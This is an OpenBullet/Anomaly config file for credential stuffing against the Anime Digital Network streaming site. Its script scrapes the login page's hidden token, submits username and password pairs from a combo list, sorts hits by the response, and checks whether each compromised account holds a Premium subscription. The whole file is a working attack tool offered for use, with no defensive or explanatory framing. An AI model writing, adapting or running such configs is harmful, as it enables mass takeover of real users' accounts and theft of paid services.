[SETTINGS]
{
  "Name": "AnimeDigitalNetwork",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2019-08-12T16:07:47.7543372+02:00",
  "AdditionalInfo": "",
  "Author": "sp6off",
  "Version": "1.3.6 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GET_Page REQUEST GET "https://animedigitalnetwork.fr/index.php/enregistrement#login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"return\" value=\"" "\" />" -> VAR "return" 

PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"" "value=\"1\" /></form>" -> VAR "var" 

FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "option\" value=\"com_users\"" VALUE "" 
  KEY "/>" VALUE "" 
  KEY "	<input type=\"hidden\" name=\"task\" value=\"user.login\"" VALUE "" 
  KEY "	<input type=\"hidden\" name=\"tmpl\" value=\"component\"" VALUE "" 
  KEY "	<input type=\"hidden\" name=\"return\"" VALUE "" 
  KEY "value=\"L2luZGV4LnBocC9tb24tZXNwYWNl\"" VALUE "" 
  KEY "<input type=\"hidden\" name=\"" VALUE "" 
  KEY "\"" VALUE "" 
  "<var>" -> VAR "cleanvar" 

#POST_Account REQUEST POST "https://animedigitalnetwork.fr/index.php/connexion?task=user.login" 
  CONTENT "username=<USER>&password=<PASS>&return=<return>&<cleanvar>=1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: animedigitalnetwork.fr" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" 
  HEADER "Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://animedigitalnetwork.fr/index.php/enregistrement?return=aHR0cHM6Ly9hbmltZWRpZ2l0YWxuZXR3b3JrLmZyLw==" 
  HEADER "DNT: 1" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "TE: Trailers" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" EqualTo "https://animedigitalnetwork.fr/index.php/mon-espace?view=myprofile" 
  KEYCHAIN Failure OR 
    KEY "Identifiant de sécurité invalide" 
    KEY "Identifiant ou mot de passe incorrect." 

REQUEST GET "https://animedigitalnetwork.fr/index.php/mon-espace?view=mysubscription" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "Premium" 
  KEYCHAIN Custom "FREE" OR 
    KEY "Non abonné" 
    KEY "Vous n'avez pas d'abonnement ADN en cours." 

